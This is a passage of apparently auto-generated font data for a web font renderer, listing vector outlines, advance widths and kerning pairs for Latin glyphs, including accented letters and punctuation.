,-41r-38,-56r50,-56r23,0r-49,56r37,56r-23,0","w":110,"k":{"Y":26,"W":20,"V":20,"T":20,"J":-7}},{"d":"96,-232r6,-30r26,0r-6,30r-26,0"},{"d":"9,-110v0,-120,125,-190,220,-127v22,15,35,37,41,65r-28,0v-11,-40,-41,-65,-89,-65v-72,0,-115,49,-117,122v-2,59,36,97,94,97v47,-1,78,-24,97,-56r30,0v-22,46,-65,79,-129,79v-69,1,-119,-45,-119,-115xm122,-343r14,0r26,44r41,-44r16,0r-47,61r-23,0","w":270},{"d":"27,3v-9,52,-28,80,-84,71v3,-10,0,-28,19,-21v31,-2,36,-18,42,-50r39,-196r22,0xm46,-212r8,-44r23,0r-8,44r-23,0","w":72},{"d":"255,-116r0,17r-210,0r0,-17r210,0","w":299},{"d":"103,-16v38,-1,63,-22,75,-52r27,0v-15,43,-49,72,-102,73v-55,1,-90,-41,-94,-93v-8,-117,181,-156,200,-34r-26,0v-5,-32,-30,-55,-66,-55v-46,0,-83,40,-82,88v1,42,26,74,68,73xm118,-219r-16,0r43,-62r25,0","w":218},{"d":"116,-199v39,0,63,16,78,42r7,-35r25,0r-32,162v-11,69,-28,104,-97,106v-48,1,-83,-23,-89,-64r22,0v7,45,82,54,113,25v12,-11,20,-29,23,-53v-56,47,-161,9,-156,-72v4,-66,41,-111,106,-111xm105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm183,-273v-3,54,-105,69,-97,0r14,0v0,40,63,28,69,0r14,0","w":225},{"d":"16,0r8,-41r25,0r-8,41r-25,0","w":101},{"d":"89,-248r-68,144r68,145r68,-145xm89,-291r88,187r-88,188r-88,-188","w":177},{"d":"120,-177v-47,0,-80,41,-80,90v0,40,28,70,67,70v95,0,116,-160,13,-160xm109,5v-38,1,-67,-17,-79,-44r-20,102r-23,0r63,-319r23,0r-16,84v50,-56,165,-17,158,67v-5,65,-42,108,-106,110","w":225},{"d":"75,-246v-20,0,-31,11,-34,28r-16,0v1,-51,94,-56,95,-3v-1,20,-13,32,-31,36v55,20,21,89,-30,86v-32,-2,-54,-17,-52,-50r16,0v-2,24,13,36,36,36v23,-1,41,-12,41,-35v0,-23,-17,-30,-42,-32v2,-4,0,-13,5,-14v41,7,58,-52,12,-52","w":134},{"d":"10,-112v0,-153,224,-209,259,-60r-26,0v-10,-40,-40,-65,-87,-65v-73,0,-116,48,-120,124v-4,86,99,119,161,72v19,-15,34,-33,42,-57r-130,0r5,-23r156,0v-9,77,-61,124,-141,126v-73,2,-119,-45,-119,-117xm229,-335v-3,54,-105,69,-97,0r14,0v0,40,63,28,69,0r14,0","w":281},{"d":"184,-188v6,-50,-71,-64,-102,-36v-12,11,-20,38,-25,62r113,0r-4,19r-112,0r-6,30r111,0r-4,19r-111,0v-12,43,7,76,53,76v38,0,54,-15,63,-46r25,0v-11,42,-37,69,-87,69v-59,0,-92,-39,-79,-98r-20,0r4,-20r20,0r6,-30r-21,0r4,-19r20,0v10,-56,33,-99,95,-99v48,0,82,26,81,73r-24,0","w":203},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r8,-36r24,0r-37,193r-26,0r4,-15v-59,45,-162,9,-157,-73v4,-66,41,-111,106,-111xm155,-227r6,-29r25,0r-6,29r-25,0xm90,-227r6,-29r25,0r-6,29r-25,0","w":225},{"d":"75,-132v72,0,87,-113,10,-113v-35,0,-61,28,-60,64v0,28,22,49,50,49xm75,-117v-38,1,-70,-27,-69,-65v2,-48,32,-76,81,-78v39,-1,71,27,70,65v-1,48,-33,77,-82,78","w":163},{"d":"-1,0r49,-256r24,0r-44,233r106,0r-4,23r-131,0","w":148,"k":{"\u201e":-20,"\u201a":-20,"\u203a":13,"\u2039":13,"\u2019":61,"\u2018":73,"\u201d":61,"\u201c":73,"\u0153":6,"\u0152":20,"\u00bb":13,"\u00ab":13,"\u00f8":6,"\u00e6":6,"\u00d8":20,"\u00c5":-13,"y":13,"u":6,"o":6,"e":6,"a":6,"Y":13,"W":20,"V":20,"U":6,"T":20,"O":20,"A":-13,"-":6}},{"d":"154,-196v0,-40,-42,-40,-86,-38r-17,89v52,4,104,-2,103,-51xm143,-79v0,-46,-47,-43,-97,-41r-19,97v60,1,116,4,116,-56xm170,-76v-4,54,-36,76,-100,76r-72,0r50,-256v67,-2,137,-4,134,61v-1,33,-19,49,-45,62v20,9,35,29,33,57","w":190,"k":{"\u201e":6,"\u201a":6,"\u2018":10,"\u201c":10,"Y":6}},{"d":"110,-285v-16,0,-28,11,-28,27v0,16,12,27,28,27v15,0,27,-12,27,-27v0,-15,-11,-27,-27,-27xm110,-216v-24,0,-43,-19,-43,-42v-1,-24,20,-43,43,-43v23,0,42,19,42,43v1,23,-19,43,-42,42"},{"d":"83,-252r0,97r-18,0r0,-97r18,0xm35,-252r0,97r-18,0r0,-97r18,0","w":100},{"d":"253,-24r0,17r-207,0r0,-17r207,0xm253,-189r-177,59r177,60r0,18r-207,-70r0,-15r207,-71r0,19","w":299},{"d":"153,-198v0,-39,-54,-54,-77,-25v-27,34,-28,103,-41,152v5,1,15,-2,17,3v-2,29,19,50,45,50v28,0,49,-24,49,-52v0,-38,-28,-53,-68,-52v4,-7,-2,-21,11,-20v35,2,64,-23,64,-56xm97,5v-36,0,-57,-19,-67,-47r-8,42r-23,0r37,-192v8,-40,34,-67,78,-68v35,-1,64,27,63,62v0,34,-19,58,-45,67v24,7,39,28,40,57v1,43,-32,80,-75,79","w":190,"k":{"\u201e":-13,"\u201a":-13,"\u2019":6,"\u2018":13,"\u201d":6,"\u201c":13,"-":-7}},{"d":"43,0r16,-85r-48,-171r27,0r39,141r92,-141r28,0r-112,172r-18,84r-24,0xm108,-281r-16,0r43,-62r25,0","w":166},{"d":"56,5v-31,0,-58,-27,-52,-60v7,1,18,-2,23,1v-1,20,14,37,32,37v17,0,34,-17,32,-35v-1,-36,-69,-49,-69,-93v0,-29,23,-55,53,-54v30,0,50,20,47,53r-23,1v3,-17,-6,-32,-24,-32v-17,0,-29,13,-29,29v0,27,79,57,70,91v0,35,-24,62,-60,62xm81,47v0,41,-54,38,-87,26r5,-14v19,7,62,16,62,-12v0,-16,-16,-15,-35,-16r10,-31r12,0r-7,20v24,-2,40,6,40,27","w":131},{"d":"83,-152v-1,-64,-6,-118,67,-108r0,19v-90,-19,-7,137,-80,148v41,6,34,55,34,103v0,37,9,45,46,44r0,19v-71,9,-69,-42,-67,-108v1,-38,-15,-50,-52,-49r0,-19v37,1,53,-10,52,-49"},{"d":"155,-103r-25,-135r-75,135r100,0xm-28,0r139,-256r39,0r51,256r-26,0r-15,-80r-117,0r-43,80r-28,0xm129,-281r-16,0r43,-62r25,0","w":214},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r8,-36r24,0r-37,193r-26,0r4,-15v-59,45,-162,9,-157,-73v4,-66,41,-111,106,-111xm121,-261v19,3,46,19,53,-4r14,0v-6,35,-40,36,-70,23v-8,1,-13,6,-16,13r-14,0v8,-19,13,-30,33,-32","w":225},{"d":"103,-16v38,-1,63,-22,75,-52r27,0v-15,43,-49,72,-102,73v-55,1,-90,-41,-94,-93v-8,-117,181,-156,200,-34r-26,0v-5,-32,-30,-55,-66,-55v-46,0,-83,40,-82,88v1,42,26,74,68,73","w":218},{"d":"45,73v-37,-6,-61,-45,-49,-90v20,-73,16,-175,60,-224v12,-13,31,-18,54,-20r-5,23v-35,7,-46,21,-53,58r-35,188v-1,23,14,38,32,42","w":95},{"d":"17,0r8,-41r25,0r-8,41r-25,0xm46,-152r8,-41r25,0r-8,41r-25,0","w":103},{"d":"56,5v-31,0,-58,-27,-52,-60v7,1,18,-2,23,1v-1,20,14,37,32,37v17,0,34,-17,32,-35v-1,-36,-69,-49,-69,-93v0,-29,23,-55,53,-54v30,0,50,20,47,53r-23,1v3,-17,-6,-32,-24,-32v-17,0,-29,13,-29,29v0,27,79,57,70,91v0,35,-24,62,-60,62","w":131},{"d":"120,-177v-45,0,-80,41,-80,88v0,43,26,70,67,72v95,5,116,-160,13,-160xm109,5v-39,1,-63,-15,-79,-41r-20,99r-23,0r50,-256r25,0r-4,19v52,-53,164,-14,157,69v-5,65,-42,108,-106,110","w":225},{"d":"158,-139v1,-47,-51,-42,-100,-42r-19,98v63,3,118,1,119,-56xm185,-138v0,73,-71,87,-151,81r-11,57r-25,0r50,-256r24,0r-9,48v68,-3,122,7,122,70","w":198},{"d":"9,-110v0,-120,125,-190,220,-127v22,15,35,37,41,65r-28,0v-11,-40,-41,-65,-89,-65v-72,0,-115,49,-117,122v-2,59,36,97,94,97v47,-1,78,-24,97,-56r30,0v-22,46,-65,79,-129,79v-69,1,-119,-45,-119,-115xm156,-281r-16,0r43,-62r25,0","w":270},{"d":"51,-112v-10,0,-16,-8,-16,-16v0,-9,8,-15,16,-16v8,0,17,8,17,16v0,9,-7,16,-17,16","w":101},{"d":"43,0r16,-85r-48,-171r27,0r39,141r92,-141r28,0r-112,172r-18,84r-24,0","w":166,"k":{"\u201e":40,"\u201a":40,"\u203a":33,"\u2039":40,"\u2019":-13,"\u2018":-20,"\u201d":-13,"\u201c":-20,"\u0153":20,"\u00bb":33,"\u00ab":40,"\u00f8":20,"\u00e6":20,"\u00c5":16,"u":20,"o":20,"i":6,"e":20,"a":20,"A":16,";":18,":":18,".":48,"-":29,",":48}},{"d":"40,-93v-9,40,2,76,43,75v85,-2,72,-108,93,-175r23,0r-38,193r-23,0r4,-18v-44,45,-146,20,-127,-63v9,-39,15,-75,22,-112r23,0xm141,-219r-15,0r-50,-62r26,0","w":200},{"d":"50,0r-28,0r145,-232r-116,0r4,-24r147,0r-4,20","w":203},{"d":"255,-151r0,88r-17,0r0,-70r-193,0r0,-18r210,0","w":299},{"d":"155,-281r22,0r-44,62r-13,0xm108,-281r23,0r-41,62r-13,0"},{"d":"207,-40r62,0r18,-82xm276,0r-16,0r6,-27r-79,0r3,-16r98,-100r19,0r-22,103r20,0r-3,13r-20,0xm227,-261r21,0r-159,266r-21,0xm72,-112r-15,0r26,-121r-50,48r-11,-8r64,-63r17,0","w":316},{"d":"255,-83r0,17r-210,0r0,-17r210,0xm255,-149r0,18r-210,0r0,-18r210,0","w":299},{"d":"364,-106r-4,20r-360,0r4,-20r360,0","w":360},{"d":"127,5v-70,0,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,116,46,116,117v0,87,-59,149,-144,149xm153,-237v-73,3,-114,50,-117,125v-1,55,37,93,92,93v70,0,118,-54,118,-125v0,-55,-37,-95,-93,-93xm181,-281r-15,0r-50,-62r26,0","w":281},{"d":"157,-30v-30,57,-155,44,-145,-35v7,-61,24,-130,34,-191r25,0r-35,188v-6,50,70,67,94,33v32,-45,37,-154,53,-221r25,0v-15,70,-24,174,-51,226","w":208,"k":{"\u00c5":6,"A":6}},{"d":"119,-238v-45,0,-49,60,-17,79v25,-10,46,-20,47,-48v1,-18,-13,-31,-30,-31xm31,-68v-2,44,51,64,83,35v10,-10,22,-23,32,-41r-53,-57v-32,12,-60,28,-62,63xm175,-210v-2,35,-28,56,-57,69r42,45r43,-73r29,0r-54,92r54,60r-16,17r-53,-56v-20,33,-41,59,-85,61v-41,1,-74,-33,-73,-74v2,-45,32,-66,70,-81v-39,-37,-19,-111,43,-111v32,0,58,21,57,51","w":244},{"d":"17,-41r48,-58r-36,-53r24,0r35,53r-47,58r-24,0","w":110,"k":{"\u00c5":13,"Y":36,"X":20,"W":20,"V":33,"T":33,"J":-7,"A":13}},{"d":"-16,0r4,-23r174,-211r-127,0r3,-22r160,0r-5,23r-173,212r135,0r-5,21r-166,0","w":178,"k":{"\u201e":-13,"\u201a":-13,"\u203a":6,"\u2039":13,"\u2019":-7,"\u2018":-13,"\u201d":-7,"\u201c":-13,"\u00bb":6,"\u00ab":13,"-":6}},{"d":"17,-41r48,-58r-36,-53r24,0r35,53r-47,58r-24,0xm67,-41r48,-58r-35,-53r24,0r34,53r-46,58r-25,0","w":164,"k":{"\u00c5":13,"Y":36,"X":20,"W":20,"V":33,"T":33,"J":-7,"A":13}},{"d":"-16,0r4,-23r174,-211r-127,0r3,-22r160,0r-5,23r-173,212r135,0r-5,21r-166,0xm79,-343r14,0r26,44r41,-44r16,0r-47,61r-23,0","w":178},{"d":"-1,0r50,-256r25,0r-50,256r-25,0xm86,-281r-15,0r-50,-62r26,0","w":72},{"d":"20,-188r42,-68r25,0r-42,68r-25,0","w":69},{"d":"155,-103r-25,-135r-75,135r100,0xm-28,0r139,-256r39,0r51,256r-26,0r-15,-80r-117,0r-43,80r-28,0xm122,-323v19,3,46,19,53,-4r14,0v-6,35,-40,36,-70,23v-8,1,-13,6,-16,13r-14,0v8,-19,13,-30,33,-32","w":214},{"d":"62,-281r14,0r26,44r41,-44r16,0r-47,61r-23,0"},{"d":"100,-72r0,134r-19,0r0,-134r19,0xm100,-252r0,134r-19,0r0,-134r19,0"},{"d":"-29,26r45,-66r27,0r-44,66r-28,0","w":69,"k":{"\u00d0":-7,"\u0141":-7,"\uf002":6,"\uf001":6,"\u0152":20,"\u00d8":20,"\u00c6":-27,"\u00df":-7,"\u00c5":-20,"y":6,"w":15,"f":6,"Z":-13,"Y":33,"X":-15,"W":24,"V":40,"T":23,"R":-7,"P":-7,"O":20,"L":-7,"K":-7,"J":-20,"H":-7,"G":13,"F":-7,"D":-7,"C":20,"B":-7,"A":-20}},{"d":"-1,0r49,-256r131,0r-4,24r-107,0r-17,91r106,0r-4,23r-107,0r-18,95r106,0r-4,23r-131,0xm135,-281r-15,0r-50,-62r26,0"},{"d":"51,-112v-10,0,-16,-8,-16,-16v0,-9,8,-15,16,-16v8,0,17,8,17,16v0,9,-7,16,-17,16","w":101},{"d":"2,0r20,-105r-27,16r4,-26r28,-16r25,-125r24,0r-21,112r53,-31r-5,27r-53,30r-18,95r106,0r-4,23r-132,0","w":150,"k":{"\u201e":-20,"\u201a":-20,"\u203a":13,"\u2039":13,"\u2019":61,"\u2018":73,"\u201d":61,"\u201c":73,"\u0153":6,"\u0152":20,"\u00bb":13,"\u00ab":13,"\u00f8":6,"\u00e6":6,"\u00d8":20,"\u00c5":-13,"y":13,"u":6,"o":6,"e":6,"a":6,"Y":13,"W":20,"V":20,"U":6,"T":20,"O":20,"A":-13,"-":6}},{"d":"-2,0r50,-256r24,0r-22,114r125,0r22,-114r25,0r-50,256r-24,0r22,-118r-124,0r-23,118r-25,0","w":219,"k":{".":6,",":6}},{"d":"127,5v-70,0,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,116,46,116,117v0,87,-59,149,-144,149xm153,-237v-73,3,-114,50,-117,125v-1,55,37,93,92,93v70,0,118,-54,118,-125v0,-55,-37,-95,-93,-93xm155,-281r-16,0r43,-62r25,0","w":281},{"d":"90,-156v3,-60,11,-116,79,-104r-2,23v-57,-10,-47,39,-53,81r46,0r-2,24r-46,0v-10,62,1,152,-31,191v-10,12,-31,16,-56,15r2,-24v30,3,45,-5,48,-36r13,-146r-45,0r2,-24r45,0","w":203},{"d":"74,-188r42,-68r25,0r-42,68r-25,0xm18,-188r42,-68r25,0r-42,68r-25,0","w":121},{"d":"-1,0r50,-256r25,0r-50,256r-25,0xm87,-289r6,-29r25,0r-6,29r-25,0xm22,-289r6,-29r25,0r-6,29r-25,0","w":72},{"d":"157,-30v-30,57,-155,44,-145,-35v7,-61,24,-130,34,-191r25,0r-35,188v-6,50,70,67,94,33v32,-45,37,-154,53,-221r25,0v-15,70,-24,174,-51,226xm178,-281r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":208},{"d":"127,5v-70,0,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,116,46,116,117v0,87,-59,149,-144,149xm153,-237v-73,3,-114,50,-117,125v-1,55,37,93,92,93v70,0,118,-54,118,-125v0,-55,-37,-95,-93,-93","w":281,"k":{"\u201e":20,"\u201a":20,"\u2019":6,"\u2018":20,"\u201d":6,"\u201c":20,"Y":10,"X":6,"V":6,";":-7,":":-7,".":15,"-":-10,",":15}},{"d":"-1,0r50,-256r25,0r-50,256r-25,0xm60,-281r-16,0r43,-62r25,0","w":72},{"d":"9,-259r215,0r0,25r-179,0r124,135r-130,143r186,0r0,25r-223,0r0,-23r131,-145r-124,-135r0,-25","w":231},{"d":"59,-170v19,0,37,-17,37,-36v0,-20,-17,-37,-37,-37v-20,0,-36,17,-36,37v0,20,17,36,36,36xm10,-206v-1,-27,23,-49,49,-49v27,0,49,23,49,49v0,26,-24,50,-49,49v-27,-1,-49,-21,-49,-49","w":118},{"d":"157,-30v-30,57,-155,44,-145,-35v7,-61,24,-130,34,-191r25,0r-35,188v-6,50,70,67,94,33v32,-45,37,-154,53,-221r25,0v-15,70,-24,174,-51,226xm150,-281r-15,0r-50,-62r26,0","w":208},{"d":"-1,0r49,-256r131,0r-4,24r-107,0r-17,91r106,0r-4,23r-107,0r-18,95r106,0r-4,23r-131,0xm136,-289r6,-29r25,0r-6,29r-25,0xm71,-289r6,-29r25,0r-6,29r-25,0"},{"d":"201,-143v1,-76,-54,-97,-135,-90r-41,210v104,11,175,-28,176,-120xm227,-145v0,88,-61,145,-147,145r-83,0r49,-256v103,-8,181,15,181,111","w":239,"k":{"\u201e":20,"\u201a":20,"\u2039":-7,"\u2019":6,"\u2018":26,"\u201d":6,"\u201c":26,"\u00ab":-7,"\u00c5":6,"Y":10,"W":6,"V":6,"A":6,"-":-11}},{"d":"61,0r19,-98r-66,0r4,-19r56,0r-9,-30r-41,0r3,-19r31,0r-28,-89r27,0r40,135r90,-135r28,0r-61,89r31,0r-4,19r-41,0r-20,30r55,0r-4,19r-64,0r-21,98r-25,0","w":203},{"d":"158,-99v9,-40,-2,-76,-43,-75v-84,2,-73,107,-93,174r-22,0r37,-193r23,0r-3,18v33,-31,107,-28,123,16v33,-62,162,-46,143,48r-22,111r-23,0r23,-127v5,-51,-66,-60,-94,-30v-31,33,-32,105,-45,157r-24,0","w":339},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r7,-35r25,0r-50,255r-24,0r15,-80v-55,48,-162,11,-157,-71v4,-66,41,-111,106,-111","w":225},{"d":"84,75v-63,10,-54,-58,-16,-75r11,0v-13,11,-23,23,-25,41v-2,18,17,16,34,16"},{"d":"160,-273v-3,54,-105,69,-97,0r14,0v0,40,63,28,69,0r14,0"},{"d":"77,-256r-50,256r-23,0r50,-256r23,0","w":72},{"d":"48,-189r-13,-67r23,0r13,67r-23,0xm100,-189r-13,-67r23,0r13,67r-23,0","w":121,"k":{"\uf002":-10,"\uf001":-10,"\u0152":-11,"\u00d8":-11,"\u00c6":50,"\u00c5":41,"y":-21,"w":-23,"r":-13,"f":-10,"Z":6,"Y":-11,"W":-15,"V":-17,"T":-7,"O":-11,"J":48,"A":41}},{"d":"184,-111v0,-59,-76,-86,-119,-48v-14,12,-24,28,-29,48r148,0xm101,-17v39,0,59,-20,73,-48r28,0v-16,42,-47,70,-101,70v-54,0,-95,-39,-93,-93v2,-65,41,-111,107,-111v60,0,98,44,93,110r-175,0v0,42,27,72,68,72xm116,-219r-16,0r43,-62r25,0","w":218},{"d":"134,-332v-13,0,-26,13,-26,26v0,13,13,25,26,25v14,1,25,-11,25,-25v0,-14,-12,-26,-25,-26xm134,-266v-21,0,-41,-19,-41,-40v0,-22,19,-41,41,-41v22,0,40,19,40,41v0,22,-19,40,-40,40xm155,-103r-25,-135r-75,135r100,0xm-28,0r139,-256r39,0r51,256r-26,0r-15,-80r-117,0r-43,80r-28,0","w":214,"k":{"\u201e":-20,"\u201a":-20,"\u203a":6,"\u2039":13,"\u2019":43,"\u2018":46,"\u201d":43,"\u201c":46,"\u0152":6,"\u00bb":6,"\u00ab":13,"\u00d8":6,"y":-7,"w":-7,"v":-7,"Y":13,"V":6,"T":13,"S":-7,"Q":6,"O":6,"G":6,"C":6,";":-7,":":-7,"-":8}},{"d":"6,-58v-5,44,56,52,74,23v29,-48,35,-155,52,-221r25,0v-20,78,-18,187,-62,241v-32,39,-126,20,-113,-43r24,0","w":152,"k":{"\u2019":-7,"\u201d":-7,"-":6}},{"d":"184,-107v2,-41,-29,-71,-70,-71v-48,-1,-81,42,-81,92v0,39,29,71,67,70v53,-2,82,-40,84,-91xm99,5v-53,2,-92,-42,-91,-94v2,-67,42,-108,107,-111v52,-3,96,41,94,94v-3,67,-42,108,-110,111xm143,-227r6,-29r25,0r-6,29r-25,0xm78,-227r6,-29r25,0r-6,29r-25,0","w":218},{"d":"153,-237v-79,3,-128,63,-114,149v63,-28,135,-8,170,37v23,-21,36,-52,37,-93v0,-55,-37,-95,-93,-93xm192,-37v-31,-39,-91,-57,-147,-31v16,50,100,64,147,31xm268,-8v-23,4,-43,-3,-56,-13v-73,57,-210,16,-202,-91v7,-92,55,-147,145,-149v71,-2,117,47,116,118v0,48,-15,83,-41,108v12,7,24,10,41,8","w":281},{"d":"-1,0r49,-256r131,0r-4,24r-107,0r-17,91r106,0r-4,23r-107,0r-18,95r106,0r-4,23r-131,0"},{"d":"179,-182v0,-55,-51,-52,-111,-51r-45,233r-25,0r49,-256v81,-2,160,-2,158,76v-1,50,-38,79,-87,84r52,96r-30,0r-60,-116v55,2,99,-18,99,-66","w":211,"k":{"\u203a":6,"\u2039":13,"\u2018":13,"\u201c":13,"\u0153":6,"\u00bb":6,"\u00ab":13,"\u00f8":6,"\u00e6":6,"\u00c5":6,"u":6,"o":6,"e":6,"a":6,"T":6,"A":6,";":13,":":13,".":13,"-":16,",":13}},{"d":"65,-193r-37,193r-23,0r38,-193r22,0","w":72},{"d":"147,-117v47,20,88,15,122,-15r0,20v-20,14,-39,24,-68,25v-26,1,-78,-26,-102,-24v-28,3,-45,13,-68,28r0,-20v34,-24,69,-34,116,-14","w":299},{"d":"-2,0r-29,0r113,-134r-57,-122r27,0r46,102r85,-102r29,0r-104,125r59,131r-26,0r-50,-111","w":185,"k":{"\u201e":-20,"\u201a":-20,"\u2039":20,"\u2019":-7,"\u2018":-13,"\u201d":-7,"\u201c":-13,"\u0152":6,"\u00ab":20,"\u00d8":6,"\u00c5":-7,"e":13,"O":6,"C":6,"A":-7,"-":18}},{"d":"31,0r44,-234r-60,0r4,-22r144,0r-4,22r-59,0r-45,234r-24,0","w":138,"k":{"\u201e":26,"\u201a":26,"\u203a":29,"\u2039":33,"\u2018":-13,"\u201c":-13,"\u0153":29,"\u00bb":29,"\u00ab":33,"\u00f8":29,"\u00e6":29,"\u00c5":20,"y":23,"w":23,"u":29,"s":28,"r":23,"o":29,"e":29,"c":29,"a":29,"C":13,"A":20,";":23,":":23,".":40,"-":33,",":40}},{"d":"-1,0r49,-256r131,0r-4,24r-107,0r-17,91r106,0r-4,23r-107,0r-23,118r-24,0xm230,-178v16,-14,34,-22,64,-21v-3,7,-2,18,-6,24v-87,0,-72,107,-92,175r-23,0r38,-193r22,0","w":285},{"d":"192,-256r93,98r-25,0r-80,-80r-81,80r-25,0r94,-98r24,0","w":360},{"d":"10,-112v0,-153,224,-209,259,-60r-26,0v-10,-40,-40,-65,-87,-65v-73,0,-116,48,-120,124v-4,86,99,119,161,72v19,-15,34,-33,42,-57r-130,0r5,-23r156,0v-9,77,-61,124,-141,126v-73,2,-119,-45,-119,-117","w":281,"k":{"\u201e":6,"\u201a":6,"\u2019":10,"\u2018":20,"\u201d":10,"\u201c":20,"Y":6,"T":6,"-":-8}},{"d":"40,-93v-9,40,2,76,43,75v85,-2,72,-108,93,-175r23,0r-38,193r-23,0r4,-18v-44,45,-146,20,-127,-63v9,-39,15,-75,22,-112r23,0xm115,-219r-16,0r43,-62r25,0","w":200},{"d":"184,-188v6,-50,-71,-64,-102,-36v-12,11,-20,38,-25,62r113,0r-4,19r-112,0r-6,30r111,0r-4,19r-111,0v-12,43,7,76,53,76v38,0,54,-15,63,-46r25,0v-11,42,-37,69,-87,69v-59,0,-92,-39,-79,-98r-20,0r4,-20r20,0r6,-30r-21,0r4,-19r20,0v10,-56,33,-99,95,-99v48,0,82,26,81,73r-24,0","w":203},{"d":"162,-193r-37,193r-23,0r37,-193r23,0xm143,-212r8,-44r23,0r-8,44r-23,0xm52,-193v5,-45,23,-66,71,-66v-3,6,1,20,-8,21v-31,1,-36,14,-40,45r31,0r-4,20r-32,0r-33,173r-23,0r33,-173r-31,0r5,-20r31,0","w":172},{"d":"224,-288r0,13r-22,0r-104,282r-7,0r-58,-158r-20,7r-3,-10r43,-15r48,131r92,-250r31,0","w":224},{"d":"147,-16v-53,47,-164,13,-139,-78v20,-73,18,-167,108,-167v57,0,93,40,78,99v-13,51,-15,118,-47,146xm33,-91v-21,63,55,94,98,59v28,-33,36,-106,42,-160v5,-47,-74,-60,-102,-32v-25,25,-24,91,-38,133","w":203},{"d":"8,-89v0,-77,73,-133,147,-100r-19,-36r-59,12r-4,-17r55,-10r-10,-21r26,0r8,15r40,-8r4,17r-36,7v16,41,49,73,49,125v0,67,-42,108,-110,110v-54,2,-92,-42,-91,-94xm100,-16v96,0,115,-162,14,-162v-48,0,-81,42,-81,92v0,39,29,70,67,70","w":218},{"d":"81,-256r-21,106r26,-15r-5,26r-26,14r-24,125r-23,0r22,-111r-27,14r6,-25r25,-15r24,-119r23,0","w":77},{"d":"253,-180r-179,73r179,72r0,20r-207,-85r0,-14r207,-86r0,20","w":299},{"d":"117,-235v-38,0,-57,45,-31,69v28,25,82,37,82,92v0,44,-30,67,-73,68r-7,39r-21,0r8,-41v-35,-9,-61,-33,-55,-76v7,1,18,-2,24,1v-5,34,17,54,51,54v29,0,49,-17,49,-46v0,-47,-99,-59,-94,-118v3,-37,29,-66,67,-65r6,-35r20,0r-7,36v31,6,50,30,48,69r-24,0v2,-29,-16,-47,-43,-47","w":203},{"d":"155,-103r-25,-135r-75,135r100,0xm-28,0r139,-256r39,0r51,256r-26,0r-15,-80r-117,0r-43,80r-28,0xm155,-281r-15,0r-50,-62r26,0","w":214},{"d":"116,-199v39,0,63,16,78,42r7,-35r25,0r-32,162v-11,69,-28,104,-97,106v-48,1,-83,-23,-89,-64r22,0v7,45,82,54,113,25v12,-11,20,-29,23,-53v-56,47,-161,9,-156,-72v4,-66,41,-111,106,-111xm105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160","w":225},{"d":"13,-256r24,0r36,219r120,-219r27,0r-142,256r-22,0","w":192,"k":{"\u201e":46,"\u201a":46,"\u203a":28,"\u2039":40,"\u2019":-13,"\u2018":-20,"\u201d":-13,"\u201c":-20,"\u0153":21,"\u00bb":28,"\u00ab":40,"\u00f8":21,"\u00e6":21,"\u00c5":13,"y":6,"u":16,"o":21,"e":21,"a":21,"A":13,";":18,":":18,".":46,"-":29,",":46}},{"d":"127,5v-70,0,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,116,46,116,117v0,87,-59,149,-144,149xm153,-237v-73,3,-114,50,-117,125v-1,55,37,93,92,93v70,0,118,-54,118,-125v0,-55,-37,-95,-93,-93xm209,-281r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":281},{"d":"-2,0r50,-256r27,0r110,221r42,-221r25,0r-49,256r-27,0r-110,-221r-43,221r-25,0","w":250},{"d":"-1,0r50,-256r25,0r-50,256r-25,0xm60,-294r6,-30r26,0r-6,30r-26,0","w":72},{"d":"102,-108r-4,23r-83,0r4,-23r83,0","w":115,"k":{"\u00d0":-13,"\u0141":-13,"\u0153":-13,"\u0152":-13,"\u00f8":-13,"\u00d8":-13,"\u00c6":-10,"\u00df":-7,"w":-13,"o":-13,"Y":15,"X":13,"V":8,"T":18,"R":-13,"P":-13,"O":-13,"L":-13,"K":-13,"J":-20,"H":-13,"G":-13,"F":-13,"D":-13,"C":-7,"B":-13}},{"d":"114,-238v-43,0,-72,36,-71,79v0,36,25,61,61,61v41,0,69,-34,69,-77v0,-36,-24,-63,-59,-63xm112,-261v65,0,107,68,76,129v-21,41,-81,94,-115,132r-30,0r72,-79v-58,7,-96,-24,-96,-79v0,-57,39,-103,93,-103","w":203},{"d":"115,0r-25,0r42,-215r-79,86r-18,-15r102,-112r28,0","w":203},{"d":"91,5v-51,0,-86,-29,-84,-81r24,0v-2,37,24,58,59,58v42,0,69,-33,69,-77v0,-63,-91,-72,-115,-28r-20,-7r46,-126r123,0r-6,23r-100,0r-24,70v55,-30,120,5,120,71v0,56,-38,98,-92,97","w":203},{"d":"102,-80v-7,-70,90,-134,126,-67r11,-22r16,0r-27,115v0,10,7,17,19,16v50,-4,72,-48,73,-100v2,-63,-59,-104,-125,-102v-94,3,-149,58,-154,150v-7,128,167,153,250,91r7,10v-31,22,-67,39,-115,39v-97,0,-162,-49,-162,-144v0,-100,71,-162,175,-162v81,0,143,40,143,119v0,66,-33,115,-97,115v-22,0,-37,-10,-33,-32v-10,18,-26,31,-52,32v-37,0,-52,-21,-55,-58xm123,-78v0,41,44,51,70,29v20,-17,23,-49,31,-77v-4,-19,-17,-35,-38,-35v-38,0,-63,41,-63,83","w":360},{"d":"158,-198v1,-25,-19,-40,-43,-40v-30,0,-51,22,-51,52v0,23,19,37,44,37v29,0,50,-21,50,-49xm153,-78v0,-31,-23,-51,-55,-51v-36,0,-63,24,-63,60v0,31,22,51,53,51v33,0,65,-27,65,-60xm9,-70v-1,-38,23,-64,54,-73v-48,-37,-11,-118,53,-118v38,0,66,26,66,63v0,31,-16,46,-39,56v69,34,25,147,-54,147v-48,0,-80,-29,-80,-75","w":203},{"d":"253,-114r0,14r-207,85r0,-2